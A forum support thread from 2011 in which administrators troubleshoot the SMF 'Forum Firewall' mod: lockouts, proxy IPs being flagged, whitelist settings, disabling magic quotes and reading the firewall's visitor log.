Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
Disallow: /forum/index.php?action
Disallow: /forum/Themes
Disallow: /forum/Sources
Disallow: /forum/msg
Disallow: /forum/sa=showPosts
Disallow: /forum/prev_next
Disallow: /forum/action=emailuser
Disallow: /forum/action=printpage
Disallow: /forum/action=recent
Disallow: /forum/action=help
Disallow: /forum/action=login
Disallow: /forum/action=profile
Disallow: /forum/action=register
Disallow: /forum/action=search
Disallow: /forum/action=stats
Disallow: /forum/action=unread
Disallow: /forum/action=verificationcode
Disallow: /forum/action=who
Disallow: /forum/Themes/


Thanking you.
Title: Re: Forum Firewall
Post by: butchs on August 12, 2011, 05:23:54 AM
Did you see this link? (http://www.veign.com/blog/2007/10/06/robots-txt-file-for-an-smf-forum/)
:)
Title: Re: Forum Firewall
Post by: infoseeker on August 12, 2011, 09:36:12 AM
Thanks butchs.

I got it.

All your mods will convert people from others to SMF.


Thanks for giving secured forums.


GOD BLESS YOU.
Title: Re: Forum Firewall
Post by: butchs on August 12, 2011, 05:57:25 PM
Ahhh  Shucks...  ;)
Title: Re: Forum Firewall
Post by: MiY4Gi on August 12, 2011, 06:58:22 PM
I increased my trigger back to 0.4. I accidentally DOS'd my own forum.  :D
Title: Re: Forum Firewall
Post by: ljunatic on August 13, 2011, 07:34:47 PM
Quote from: stratocaster on July 22, 2011, 02:01:14 AM
Thanks for the reply.


I turnning on de eval, but errors are presented in the same way


http://forum_name/index.php?topic=2514.msg%msg_id%
2: in_array() [<a href='function.in-array'>function.in-array</a>]: Wrong datatype for second argument
File: /home/user_name/public_html/Sources/Security.php
Line: 825


http://forum_name/index.php?topic=2514.msg%msg_id%
2: array_intersect() [<a href='function.array-intersect'>function.array-intersect</a>]: Argument #2 is not an array
File: /home/user_name/public_html/Sources/Security.php
Line: 828


http://forum_name/index.php?topic=2549.0;prev_next=prev
8: Undefined variable: removals
File: /home/user_name/public_html/Sources/Load.php
Line: 934


I reinstalled 1.1.3 without problems, but when I enable the "Enable Testing", I still have the same errors.
when I have version 1.1.1 installed, these errors do not occur.

I do not know what procedures I need to do to solve this.

Thank you.


I am having the same problem , but it happened weeks after the initial install when I went to blocking violations. The errors are not bot hits, but were logged when I logged in, attempted to post. My test account was treated as a guest with no permissions. My admin account was working as usual.

I may try an earlier mod version to see of it functions as it has in the past.

I have a thread on SMF Helper about this that was started while I was trying to fix my forum
Title: Re: Forum Firewall
Post by: butchs on August 13, 2011, 07:59:54 PM
Was your "test account " blociked?  If not, another user or bot could have been on line the same time as you.  The only way you cam confirm is to view your cpanel visitors log the time the error occurred.

As stated earlier the mod does not alter Security.php and that line in Load.php.  Because of this it is hard to believe that the mod generated that error in your error log.  Please give details for your visitor log in cpanel and confirm that your test is repeatable.
???
Title: Re: Forum Firewall
Post by: ljunatic on August 14, 2011, 07:23:07 PM
I will try and confirm the cpanel logs. The error logs were all tied to registered members as I recall

But, I can confirm that removing forum firewall 1.1.3 returned the function of my forum to normal with no errors in the log for the last 24 hours. The mod had been installed since the day SMF sent out notice of the update. I had been using the logging function without blocking violations since that date with no problem. Then,  when I enabled blocking if violations on Friday night and went to bed. Next mornig the error log was 85 pages and no one had posted except for an admin

On my last attempt, installing the mod caused a situation were all registered members other than admins were unable to post, IM, read messages or any other action reserved for registered members. They  were able to log in, but were restricted in access to that of a guest. I attempted the removal and re-installation of forum firewall 1.1.3  twice to confirm

As an admin, no problem was encountered other than a very long list of errors logged eerily similar to the examples I quoted.

The install of the mod was  normal with no errors, and the issues began when I enabled logging of violations or blocking. The problem would then persist until I removed the mod.

I downloaded a copy of the mod version 1.1.1 and installed it. My forum has been working normally with zero error and members are reporting that all their problems have been solved.

I trust that you know more about how this works than any other, and I am not questioning your expertise. Just reporting the issue and hoping to find a solution because I really do want to keep the mod in use
Title: Re: Forum Firewall
Post by: butchs on August 15, 2011, 05:44:10 AM
It is an error log and the forum is functioning correctly.  The errors are from SMF sections that the mod does not edit. I will look at it but honestly errors of that nature are usually due to bugs in SMF.  This is why I assumed bots are hitting it to draw out weakness.  At this stage of SMF's release I doubt the errors are anything but minor.  That being said, I would have to edit SMF code to correct and I really do not wish to debug SMF source.

I see nothing to worry about.
8)
Title: Re: Forum Firewall
Post by: ALOJARIA on August 18, 2011, 08:49:44 PM
how to disable the mod? I cannot go to my website

PlZZZZZ


(http://i1204.photobucket.com/albums/bb416/ALOJARIA/error.png)

Title: Re: Forum Firewall
Post by: MiY4Gi on August 18, 2011, 09:42:13 PM
Look in your SMF database for the SMF Settings Table, then find the Firewall_Enable entry. Change the entry from 1 to 0.

cPanel > phpMyAdmin > Your SMF database > smf_settings > forumfirewall_enable > change 1 to 0
Title: Re: Forum Firewall
Post by: ALOJARIA on August 19, 2011, 09:34:55 AM
Quote from: MiY4Gi on August 18, 2011, 09:42:13 PM
Look in your SMF database for the SMF Settings Table, then find the Firewall_Enable entry. Change the entry from 1 to 0.

cPanel > phpMyAdmin > Your SMF database > smf_settings > forumfirewall_enable > change 1 to 0
thanks a million!!!  :)
Title: Re: Forum Firewall
Post by: butchs on August 21, 2011, 08:08:09 PM
New version.
Title: Re: Forum Firewall
Post by: spartan1project on August 21, 2011, 08:55:32 PM
Im a newb, what are the recommended setting for this mod?
Title: Re: Forum Firewall
Post by: butchs on August 26, 2011, 05:26:04 AM
This is a question that has been asked before.  Try reading this thread and the built in help.
Title: Re: Forum Firewall
Post by: MiY4Gi on August 26, 2011, 09:11:40 AM
Quote from: butchs on August 26, 2011, 05:26:04 AM
This is a question that has been asked before.  Try reading this thread and the built in help.

You mean "Search" in this thread. It would take a long time to read through the entire thread. People should learn how to use the search function of the forum. It would save them and us lots of time.
Title: Re: Forum Firewall
Post by: WACKI56 on August 31, 2011, 01:19:02 PM
Hello all,

I recently installed the firewall feature to my Forum. I had serious issues with it after install, and tried to uninstall. Know I can't log in to my forum, I get a forbidden message. I tried to remove the firewall package from my server...........and I seem to have made things worse. Any help would be appreciated.

Forum is at: http://www.wcgowacki.com/KancerKidz/ [nofollow]

Bill
Title: Re: Forum Firewall
Post by: MiY4Gi on August 31, 2011, 02:50:39 PM
What do you mean you tried to remove the firewall package?
Title: Re: Forum Firewall
Post by: aerolite on September 02, 2011, 11:55:28 AM
Where can I see the firewall option? Im using Rc2 4,

When I click direct to setting something after the installation, I just get directed to Administration Center.
Title: Re: Forum Firewall
Post by: Storman™ on September 02, 2011, 01:47:19 PM
Butch - you need to update the pack-info.xml file for version 1.1.4 as it still shows (in package manager) when installed as 1.1.3

The "About" page shows as 1.1.4 though so that's ok.

Cheers  ;)
Title: Re: Forum Firewall
Post by: butchs on September 02, 2011, 05:40:48 PM
Great.  ;)

Quote from: aerolite on September 02, 2011, 11:55:28 AM
Where can I see the firewall option? Im using Rc2 4,

When I click direct to setting something after the installation, I just get directed to Administration Center.


Confirm that "ForumFirewall.english.php" is in your themes language directory.   
Title: Re: Forum Firewall
Post by: butchs on September 04, 2011, 07:25:57 PM
Quote from: Storman on September 02, 2011, 01:47:19 PM
Butch - you need to update the pack-info.xml file for version 1.1.4 as it still shows (in package manager) when installed as 1.1.3

Package manager is now corrected. 
Title: Re: Forum Firewall
Post by: chris @ Alpine on September 22, 2011, 01:35:19 PM
Thank you so very much for your mod!  It helps a lot!

One question, I don't seem to be able to search for the answer...

Can you send an example of the "User-Agent Whitelist" ?  I don't understand the instruction of "XX|YY".

Thank you again!
Title: Re: Forum Firewall
Post by: MiY4Gi on September 22, 2011, 03:14:49 PM
I think an example would be

Googlebot|Slurp|Bingbot
Title: Re: Forum Firewall
Post by: butchs on September 22, 2011, 07:51:14 PM
Be forth-warned some bad people spoof Google et al for that very reason.

Attached is a blocked google ip spoof to my site via an ip array.
Title: Re: Forum Firewall
Post by: chris @ Alpine on September 22, 2011, 08:24:37 PM
Yes, I have been getting a lot of those lately also.

So are you suggesting to let the "User-Agent Whitelist" field blank and let Bad Behavior to do its job, while ENABLING to the Firewall's "User-Agent Inspection" and "DOS Attack" options?

Thanks.

Title: Re: Forum Firewall
Post by: MiY4Gi on September 22, 2011, 08:40:07 PM
Quote from: chris @ Alpine on September 22, 2011, 08:24:37 PM
Yes, I have been getting a lot of those lately also.

So are you suggesting to let the "User-Agent Whitelist" field blank and let Bad Behavior to do its job, while ENABLING to the Firewall's "User-Agent Inspection" and "DOS Attack" options?

Thanks.



Yep. Leave the UserAgent whitelist blank. Also, make sure you have the DOS Protection settings configured correctly. I'm using SEF urls, so my DOS settings had to be changed accordingly. You must set up your robot.txt file properly. 
Title: Re: Forum Firewall
Post by: chris @ Alpine on September 22, 2011, 08:44:52 PM
Ok, thanks to both.  I will try it out.

By the way, love the Country block.  It works perfectly.
Title: Re: Forum Firewall
Post by: rebekahc on September 23, 2011, 12:23:16 AM
Hi!  I have this mod installed but have only enabled testing so far because my site just went live a few days ago.  I seem to be having a problem with legit Blackberry users getting caught by the program.  I have pages of hits for IP: BISB_3.5.1.84 with Invalid ip! and Invalid ip in proxy list! alerts.  I'm sure that's one of my members on her Blackberry - the hits exactly mirror her navigation through my site.  When I research that "IP", I think it's the Blackberry proxy from Research In Motion.  The IP shown in my Blackberry user's posts is her actual IP - the BISB_3.5.1.84 seems to be some kind of additional tag (layer? not sure what the correct term would be) added to her IP.

So, two questions: 

If this is a legit Blackberry proxy, how do I get it to stop triggering Forum Firewall so I can turn on blocking?

If this member who uses a Blackberry is in a membergroup on the Whitelist, will she still be blocked since my fourm associates her with her actual IP and Forum Firewall seems to be picking up this extra tag and therefore wouldn't recognize her as the same person/IP from the whitelist or does FF use the actual membergroup designation to determine the block?

Another similar issue.  I have a member whose work uses a private IP address.  Forum Firewall picks it up as an Invalid ip.  Her posts reflect the IP of her actual computer at work, so SMF is somehow able to look past the Private IP and get her real IP.  Which I think is probably the same thing happening with my Blackberry user.  It seems they both have an extra layer before their actual IPs that's getting caught by Forum Firewall.  So, I have the same question about my private IP person - will she be blocked even if she's in a whitelist membergroup since FF "sees" her IP as one thing and the forum "sees" her actual IP? 

How can I configure FF to look past these items and get to the users actual IPs?  Obviously it's possible because the forum is able to do it.

Thanks for any insight!
Title: Re: Forum Firewall
Post by: butchs on September 23, 2011, 04:56:26 AM
I will give you a quick reply now since i have to leave soon.  Some of those phone proxies are badly configured.  Some have security issues. Multiple ip addresses can be used, spoofed, and etc (there were several posts about this before).

I for one would not adjust my security because a member spoofs a private IP.

If it annoys you, turn off "Review Proxy List".  This will stop the proxy list! alerts.

Whitelist only prevents the member from being tested for DOS attack.
Title: Re: Forum Firewall
Post by: butchs on September 23, 2011, 05:03:43 AM
Quote from: chris @ Alpine on September 22, 2011, 08:24:37 PM
Yes, I have been getting a lot of those lately also.

This is an easy one to spot.  Search the 1st ip and you will note it is not from google.  It is most likely the script kiddies ip address.
Title: Re: Forum Firewall
Post by: rebekahc on September 23, 2011, 02:38:08 PM
Quote from: butchs on September 23, 2011, 04:56:26 AM
I will give you a quick reply now since i have to leave soon.  Some of those phone proxies are badly configured.  Some have security issues. Multiple ip addresses can be used, spoofed, and etc (there were several posts about this before).

I for one would not adjust my security because a member spoofs a private IP.

If it annoys you, turn off "Review Proxy List".  This will stop the proxy list! alerts.

Whitelist only prevents the member from being tested for DOS attack.

Thanks for your quick reply.  The two members mentioned before are extremely reliable, long-term members - one is staff.  I don't want to risk them being blocked - which would happen even if I disable "Review Proxy List" because they both hit as invalid ip.  The Blackberry user alternates between invaid ip and invalid ip in proxy list.  Plus, there are banned users who keep trying to access with proxies; I want them blocked.

I had read through the other posts, but didn't see any solutions other than disabling some of the security features.  I'd really like a way to keep legit members from being blocked while retaining as much security as possible.  :-\
Title: Re: Forum Firewall
Post by: MiY4Gi on September 23, 2011, 03:32:21 PM
Banned users aren't that much of an issue. Also, there's no way to entirely block banned users unless you block ALL proxies. I'm having a similar problem where a friend of mine can't get access to my website from his work, since his works router alters the packet headers IP structure. At the moment he's visiting the site from home.

For now, to allow Blackberry users access, un-tick "Enable IP Validation" and "Review Proxy List", until an alternate solution is found.

Butchs, perhaps you could incorporate a General IP White List, similar to the User Agent White List, where users bypass the firewall entirely. Of course, its possible to spoof IP's, but normal users won't know which IP's are white listed, so they won't know which IP's to spoof.

@rebekahc, if you really want to allow those users access without heavily compromising your site's security, then make sure those users have fixes IP's on their PCs/Phones. If their IP's constantly change, then whitelisting individual IPs won't work, and so an entire IP range would need to be whitelisted, which isn't really safe. Ask your site's blocked users to check whether proxies have been configured on their phones/PC's.
Title: Re: Forum Firewall
Post by: T3CHN0 on September 23, 2011, 11:37:34 PM
Quote from: JoeB on January 26, 2011, 07:53:53 AM
As an admin, Now I can not log in the forum :
HTTP Error 403 Forbidden You don't have permission to access
Please advice. Only can use FTP to change any file

I stopped two commands by downloding index.php by ftp

in your /index.php find
//      'forumfirewall' => array('ForumFirewall.php', 'forumfirewall'),
// start ForumFirewall
//   if (isset($modSettings['forumfirewall_enable']) && !empty($modSettings['forumfirewall_enable']) && $modSettings['forumfirewall_enable']) {
//      require_once($sourcedir . '/ForumFirewall.php'); }
// end ForumFirewall

I had this same problem. Thanks JoeB for this post.
by doing this in ftp I got access to my forum again.
before clicking on forum firewall>settings revers them edits and untick Block Violations

My own fault for turning Block Violations ON, I did read
QuoteWARNING: It is recommended that you do not enable this feature until after you operated the mod for several days
but thought "I should be OK" :D

great mod... fo far my forum has not been hacked/hijacked again.. after this month if still blocking the  theat
I will donate..

cheers
Title: Re: Forum Firewall
Post by: butchs on September 24, 2011, 08:00:23 AM
Quote from: MiY4Gi on September 23, 2011, 03:32:21 PM
For now, to allow Blackberry users access, un-tick "Enable IP Validation" and "Review Proxy List", until an alternate solution is found.

Butchs, perhaps you could incorporate a General IP White List, similar to the User Agent White List, where users bypass the firewall entirely. Of course, its possible to spoof IP's, but normal users won't know which IP's are white listed, so they won't know which IP's to spoof.

Why can't the users can simply change to a more solidly programmed proxy?  Come on, if the ip address is wrong then the proxy code is poor.

If there is no other option a preferred solution would be to research the Blackberry proxy and see if there is some logic behind it and investigate a method to determine that specific proxy is being used.  An alternative would be to contact them and ask them to fix their code.  In either event, I will need to figure out where to start.
Title: Re: Forum Firewall
Post by: butchs on September 24, 2011, 09:45:42 AM
Many mobile phone proxies are badly written.  As per this security research page (http://www.mulliner.org/security/), random tales by a mobile hacker (http://www.mulliner.org/security/feed/random_tales_mobile_hacker.pdf):

Mobile Phone Web Proxies -  It seems like some operators have different proxies for different kinds of customers:
● Proxies are also operated by 3rd parties
● Companies that build these "mini-browsers"
● Mobile web optimizers

Data leakage from mobile proxies is a security risk and totally not necessary
● Operators Need to fix their proxies
● Make their contractors fix their proxies

My opinion: If a proxy is so poorly written that it does not generate a proper ip address it is a security risk and you need to find another proxy.
:)
Title: Re: Forum Firewall
Post by: MiY4Gi on September 24, 2011, 10:49:41 AM
Quote from: butchs on September 24, 2011, 09:45:42 AM
Many mobile phone proxies are badly written.  As per this security research page (http://www.mulliner.org/security/), random tales by a mobile hacker (http://www.mulliner.org/security/feed/random_tales_mobile_hacker.pdf):

Mobile Phone Web Proxies -  It seems like some operators have different proxies for different kinds of customers:
● Proxies are also operated by 3rd parties
● Companies that build these "mini-browsers"
● Mobile web optimizers

Data leakage from mobile proxies is a security risk and totally not necessary
● Operators Need to fix their proxies
● Make their contractors fix their proxies

My opinion: If a proxy is so poorly written that it does not generate a proper ip address it is a security risk and you need to find another proxy.
:)

Well, no objections there, however it might not be possible to simply change proxies. And if one can't change proxies, one has to ask his mobile operator to change the proxy, and I doubt they'll listen.

Like you said, a preferred solution would be to figure out how their proxy works. Then the Firewall could be adjusted to cater for those proxies as well, rather than just letting the proxies bypass the Firewall.
Title: Re: Forum Firewall
Post by: rebekahc on September 27, 2011, 03:36:22 PM
Quote from: MiY4Gi on September 24, 2011, 10:49:41 AM
Quote from: butchs on September 24, 2011, 09:45:42 AM
Many mobile phone proxies are badly written.  As per this security research page (http://www.mulliner.org/security/), random tales by a mobile hacker (http://www.mulliner.org/security/feed/random_tales_mobile_hacker.pdf):

Mobile Phone Web Proxies -  It seems like some operators have different proxies for different kinds of customers:
● Proxies are also operated by 3rd parties
● Companies that build these "mini-browsers"
● Mobile web optimizers

Data leakage from mobile proxies is a security risk and totally not necessary
● Operators Need to fix their proxies
● Make their contractors fix their proxies

My opinion: If a proxy is so poorly written that it does not generate a proper ip address it is a security risk and you need to find another proxy.
:)

Well, no objections there, however it might not be possible to simply change proxies. And if one can't change proxies, one has to ask his mobile operator to change the proxy, and I doubt they'll listen.

Like you said, a preferred solution would be to figure out how their proxy works. Then the Firewall could be adjusted to cater for those proxies as well, rather than just letting the proxies bypass the Firewall.

Yes, I'm quite sure my Blackberry using member has no way to control the proxy Blackberry uses.  The same for my user whose work uses a private IP.  But, there must be some way to filter those out since SMF gives me their actual IPs rather than that proxy/private layer FF is catching.  Maybe have a whitelist of members for whom FF looks past that layer before blocking?
Title: Re: Forum Firewall
Post by: butchs on September 29, 2011, 07:40:03 PM
Whenever In make a major change I end up fixing minor bugs from obscure servers.  Right now, I am swamped (working long hours) with the job that pays my bills.  When I get some time I will look into it.
:)
Title: Re: Forum Firewall
Post by: Alex' Manson on September 30, 2011, 04:54:50 AM
Quote from: butchs on September 29, 2011, 07:40:03 PM
Whenever In make a major change I end up fixing minor bugs from obscure servers.  Right now, I am swamped (working long hours) with the job that pays my bills.  When I get some time I will look into it.
:)

*Waits Patiently* :)
Title: Re: Forum Firewall
Post by: butchs on October 01, 2011, 11:12:09 AM
No guarantee as to what I will do but nothing will change until after November.  For now the mod works and has been bug free for a while.

Things I am considering for the winter programming session:

Maybe I should make a poll to establish a priority list?  That is, if I could!   :(
Title: Re: Forum Firewall
Post by: Phi1ip on October 03, 2011, 11:20:45 AM
I wonder if someone could help me out please?  I have used this mod before without any problems but after another problem, which meant completely starting the forum from scratch, I am now getting this message:

"The server encountered an unexpected condition which prevented it from fulfilling the request.
Requested URL: /smf/index.php?action=admin;area=forumfirewall;save;sa=settings"

Unlike my previous experience I had to FTP upload the mod into a sub folder of Packages (because the PM told me the package was empty), but the Package Manager picked up the mod and installed it without any error messages.

Thanks in advance for helping me out.   
Title: Re: Forum Firewall
Post by: T3CHN0 on October 03, 2011, 11:29:27 AM
Have you check yous logs for errors
have you checked your install with the install parser make sure all strings are entered correctly
are all the files for the mod in there correct install location
now that it's installed have you tryed to uninstall then re-install
Quote(because the PM told me the package was empty)
happens to me sometimes as well, but fixed by picking the correct 'Emulate Version'
Title: Re: Forum Firewall
Post by: Phi1ip on October 07, 2011, 10:03:10 AM
Thank you for the response T3chno. Answer was "Looks like the problem was that the mod is triggering a security setting on the server which is denying it from running."

Out of curiosity how do I pick the correct "Emulate Version"?  I had originally installed from the listed file on the Package Manager.
Title: Re: Forum Firewall
Post by: T3CHN0 on October 07, 2011, 10:09:20 AM
HI go to [Package Manager] look down the bottom of the page and click on [Advanced]
(Emulate Version:) change it to what you need it to be to install your mod.
Title: Re: Forum Firewall
Post by: 5p00f3r on October 22, 2011, 10:27:42 PM
I get The following code over my forum header (over the logo)

// ForumFirewall Start $txt['permissionname_forumfirewall_goodgroup'] = 'Forum Firewall Whitelist Group'; $txt['permissionhelp_forumfirewall_goodgroup'] = 'This option will make a member group exempt from the Forum Firewall bandwidth check. This group will not to be tested for Forum Firewall DOS attempts.'; // ForumFirewall End
Title: Re: Forum Firewall
Post by: butchs on October 23, 2011, 04:27:49 AM
Your installation is not correct.  If you have a custom theme try a manual installation.
Title: Re: Forum Firewall
Post by: DragoN_PT on October 29, 2011, 09:45:17 AM
The "http://www.eastcoastrollingthunder.com/" is part of the copyright?
Title: Re: Forum Firewall
Post by: MiY4Gi on October 29, 2011, 12:30:56 PM
Quote from: DragoN_SAMP on October 29, 2011, 09:45:17 AM
The "http://www.eastcoastrollingthunder.com/" is part of the copyright?


Yes, that's Butchs's website. That link is the copyright of Forum Firewall.
Title: Re: Forum Firewall
Post by: DragoN_PT on October 29, 2011, 12:59:35 PM
Ok. Several pages before I saw himm say something like "your are free to remove it" but I wanted to make sure.
Title: Re: Forum Firewall
Post by: MiY4Gi on October 29, 2011, 01:27:11 PM
Huh, where does he say that?
Title: Re: Forum Firewall
Post by: butchs on October 29, 2011, 07:33:43 PM
Incorrect.  Read the about in the admin section of the mod.
Title: Re: Forum Firewall
Post by: DragoN_PT on October 30, 2011, 04:47:51 AM
Quote from: butchs on April 22, 2011, 06:03:06 PM
Quote from: DarkBlizz on April 22, 2011, 12:41:20 PM
outa curiousity why is the link "Protected by Forum Firewall" linked to http://www.eastcoastrollingthunder.com o.O??
You can remove it, look at the Forum Firewall about for more info on how to do it.

Page 18.. Maybe I understod it wrong.. But its ok. Just wanted to check..

Were you talking about the 10 usd donation when you refered that?
Title: Re: Forum Firewall
Post by: ^SITS^ on October 30, 2011, 06:57:16 AM
When I download the zip file, it downloads a file called "ForumFirewall"  no numbers and not with a zip file extension.  Am I crazy?
Title: Re: Forum Firewall
Post by: butchs on October 30, 2011, 08:42:59 AM
The file is fine here.  It must be something on your end.
Title: Re: Forum Firewall
Post by: Alex' Manson on November 05, 2011, 12:38:49 PM
Quote from: ^SITS^ on October 30, 2011, 06:57:16 AM
When I download the zip file, it downloads a file called "ForumFirewall"  no numbers and not with a zip file extension.  Am I crazy?

Something is wrong when your PC saves it.
After downloading it, add the .zip extension and try it , it might work!
Title: Re: Forum Firewall
Post by: ^SITS^ on November 05, 2011, 04:50:15 PM
Thanks.  Got it. :)

What the heck are MAGIC_QUOTES?  I get a security warning when I try to enable the mod.

ETA:  Did some research and found out a little about them.  What is the easiest way to turn them off?
Title: Re: Forum Firewall
Post by: MiY4Gi on November 05, 2011, 06:00:51 PM
Apparently only your website host can turn magic quotes off.
Title: Re: Forum Firewall
Post by: T3CHN0 on November 05, 2011, 06:36:12 PM
Quote from: Sisko Punk on November 05, 2011, 12:38:49 PM
Quote from: ^SITS^ on October 30, 2011, 06:57:16 AM
When I download the zip file, it downloads a file called "ForumFirewall"  no numbers and not with a zip file extension.  Am I crazy?

Something is wrong when your PC saves it.
After downloading it, add the .zip extension and try it , it might work!
this happens because FireFox7 doesn't except download names on SMF with spaces
forum firewall.zip will download as forum and no extensions. simply add the .zip your self..
if the download was called forum_firewall.zip then the problem would not happen
Title: Re: Forum Firewall
Post by: butchs on November 06, 2011, 07:55:48 AM
Quote from: ^SITS^ on November 05, 2011, 04:50:15 PM
Thanks.  Got it. :)

What the heck are MAGIC_QUOTES?  I get a security warning when I try to enable the mod.

ETA:  Did some research and found out a little about them.  What is the easiest way to turn them off?


Just add the following line to the .htaccess file in the root directory:

php_flag magic_quotes_gpc off
Title: Re: Forum Firewall
Post by: MiY4Gi on November 06, 2011, 08:45:46 AM
Quote from: butchs on November 06, 2011, 07:55:48 AM

Just add the following line to the .htaccess file in the root directory:

php_flag magic_quotes_gpc off


That didn't work the last time I tried it.
Title: Re: Forum Firewall
Post by: butchs on November 06, 2011, 10:32:22 AM
With some versions of php it can be turned off in php by adding to one of your .php files:

@set_magic_quotes_runtime(0);

Or it can be turned off in your php.ini file.  Usually done by a host.  Set:


magic_quotes_sybase = Off


Or you can live with it.  The message is just a warning.
Title: Re: Forum Firewall
Post by: Kindred on November 06, 2011, 04:30:20 PM
You can usually also set it in your php.ini file
Title: Re: Forum Firewall
Post by: ^SITS^ on November 06, 2011, 08:33:23 PM
Where will I find this file at? I have no problems making code changes or adding code if i know where the fle is.
Title: Re: Forum Firewall
Post by: żεχเ๏ภ on November 06, 2011, 10:15:08 PM
Quote from: ^SITS^ on November 06, 2011, 08:33:23 PM
Where will I find this file at? I have no problems making code changes or adding code if i know where the fle is.

Create a file named .htaccess and upload it to your home/root folder. Add the line there.

If you mean php.ini, normally you have to ask your webhost about that.
Title: Re: Forum Firewall
Post by: ^SITS^ on November 06, 2011, 11:26:50 PM
Quote from: żεχเ๏ภ on November 06, 2011, 10:15:08 PM
Quote from: ^SITS^ on November 06, 2011, 08:33:23 PM
Where will I find this file at? I have no problems making code changes or adding code if i know where the fle is.

Create a file named .htaccess and upload it to your home/root folder. Add the line there.

If you mean php.ini, normally you have to ask your webhost about that.

I already have a .htaccess file.  I already tried adding the command to that file, it caused my forum to go down so I had to remove it.  If it's not that big of deal, I can live with the security warning.  It only shows on the FF screen.  I will check into getting the host to turning them off.  I would rather do it myself, but if I can't, I can't.
Title: Re: Forum Firewall
Post by: ^SITS^ on November 06, 2011, 11:35:04 PM
Quote from: MiY4Gi on November 06, 2011, 08:45:46 AM
Quote from: butchs on November 06, 2011, 07:55:48 AM

Just add the following line to the .htaccess file in the root directory:

php_flag magic_quotes_gpc off


That didn't work the last time I tried it.

My forum went down when I tried this.
Title: Re: Forum Firewall
Post by: żεχเ๏ภ on November 07, 2011, 01:09:59 AM
Quote from: ^SITS^ on November 06, 2011, 11:26:50 PM
Quote from: żεχเ๏ภ on November 06, 2011, 10:15:08 PM
Quote from: ^SITS^ on November 06, 2011, 08:33:23 PM
Where will I find this file at? I have no problems making code changes or adding code if i know where the fle is.

Create a file named .htaccess and upload it to your home/root folder. Add the line there.

If you mean php.ini, normally you have to ask your webhost about that.

I already have a .htaccess file.  I already tried adding the command to that file, it caused my forum to go down so I had to remove it.  If it's not that big of deal, I can live with the security warning.  It only shows on the FF screen.  I will check into getting the host to turning them off.  I would rather do it myself, but if I can't, I can't.

So true, its not a major concern to most people.
Title: Re: Forum Firewall
Post by: MiY4Gi on November 07, 2011, 02:27:46 AM
Quote from: ^SITS^ on November 06, 2011, 11:35:04 PM
Quote from: MiY4Gi on November 06, 2011, 08:45:46 AM
Quote from: butchs on November 06, 2011, 07:55:48 AM

Just add the following line to the .htaccess file in the root directory:

php_flag magic_quotes_gpc off


That didn't work the last time I tried it.

My forum went down when I tried this.

Yeah, the same thing happened to me. I guess it depends on your hosts php configuration, or maybe even the php version.
Title: Re: Forum Firewall
Post by: butchs on November 12, 2011, 07:40:43 AM
Quote from: ^SITS^ on November 06, 2011, 11:26:50 PM
I will check into getting the host to turning them off.  I would rather do it myself, but if I can't, I can't.

Some hosts get all paranoid if you tell them you have a firewall.  So I suggest you ask them if they can simply turn it off for you since it is not required by your forum software.
Title: Re: Forum Firewall
Post by: ^SITS^ on November 12, 2011, 11:29:06 AM
I've been logging for a few days now.  The only potential trouble is that we do have a number of people that post with cellphones.  If I were to use that .htaccess file to allow their IP, would FF still keep em off the forum?  I am inclined to think it would but thought I would ask.  I think I may just live with the warning message. 

Thanks,

butchs this is a very very good mod.  BB kicks butt too.
Title: Re: Forum Firewall
Post by: butchs on November 12, 2011, 02:23:01 PM
Thank you.

Now I am confused.  Unless there is a different htaccess file that file has nothing to do with mobile phones.

The problem with some mobile phones is that the services use poorly written proxies.  Un-selecting "Review Proxy List" in the admin panel will allow more mobile users with bad proxies and more bad people access.  That is about all you can do with the exception of turning off the ip test completely.
Title: Re: Forum Firewall
Post by: ^SITS^ on November 12, 2011, 04:06:51 PM
Sorry for having confused you.  I meant using the .htaccess file to Allow the ip for the people that post with mobile phones.  Would FF still keep them out of the forum if I put allow ip xxx.xx.xxx in the .htaccess file?  I want to keep as many proxies off the forum as possible so I don't want to put limitations on it.  We have a group of bad folks that don't like us that much that are proxy nuts and my aim is too keep them off the forums as much as possible. 
Title: Re: Forum Firewall
Post by: butchs on November 13, 2011, 08:33:40 AM
If the ip passes htaccess then FF will test it.
Title: Re: Forum Firewall
Post by: societyofrobots on November 30, 2011, 06:13:44 AM
I was looking through the visitors list, and saw 'illuminationsmed' in place of what should be an IP address. What's that mean?

Quote34   194.90.190.53   2011-11-30 01:29:51   GET /my_site/index.php?topic=13992 HTTP/1.1 omgilibot/0.3 +http://www.omgili.com/Crawler.html   DOS Attack!
33   illuminationsmed   2011-11-30 00:34:50   GET /%7Esor/my_site/index.php HTTP/1.1 Mozilla/0.91 Beta (Windows) http://[censored]/%7Esor/my_site/index.php   Hack: %7e!
32   79.114.109.8   2011-11-30 00:31:50   GET /my_site/index.php?action=dlattach;attach=1371;type=avatar HTTP/1.1 Opera/9.80 (Windows NT 6.1; U; en) Presto/2.9.168 Version/11.52 http://www.my_site.com/my_site/index.php?topic=2986.0   Bad Cookie: Repeated!

Also, just a few recommendations to add to Visitors in the next release:
-add sort by IP address and Reason
-maybe a basic statistics capability to inform us the top Reasons to attend to
Title: Re: Forum Firewall
Post by: butchs on November 30, 2011, 05:39:01 PM
"illuminationsmed" could be a spoofed ip or a bad proxy. 
Title: Re: Forum Firewall
Post by: Maxtor on December 06, 2011, 02:45:13 PM
can you block this attack?

(return a blank page or a limiter "sorry too many requests with same link") ,

its a botnet attack eating up all resources at CPU.
Title: Re: Forum Firewall
Post by: butchs on December 06, 2011, 04:56:09 PM
The reason the mod exists is because of the bot attacks.  It has works for me and has worked for others. 

Not sure what they are doing but read the HELP's (search for the word HELP) in this thread and set up your robots.tst file, then install the mod.  Warning:  This mod is POWERFUL and not for newbies.  Test the mod for 1 day before enabling it to make sure you do not ban good members and yourself.  I would also recommend the Bad Behavior mod.
Title: Re: Forum Firewall
Post by: Maxtor on December 07, 2011, 01:53:27 PM
Quote from: butchs on December 06, 2011, 04:56:09 PM
The reason the mod exists is because of the bot attacks.  It has works for me and has worked for others. 

Not sure what they are doing but read the HELP's (search for the word HELP) in this thread and set up your robots.tst file, then install the mod.  Warning:  This mod is POWERFUL and not for newbies.  Test the mod for 1 day before enabling it to make sure you do not ban good members and yourself.  I would also recommend the Bad Behavior mod.


im not attacked by bots, but by botnet, which means legimate GET requests from different IPs. all i want to ask if its possible the script to check if many people request the same URL to null route them, or return a blank page.
Title: Re: Forum Firewall
Post by: butchs on December 07, 2011, 05:37:44 PM
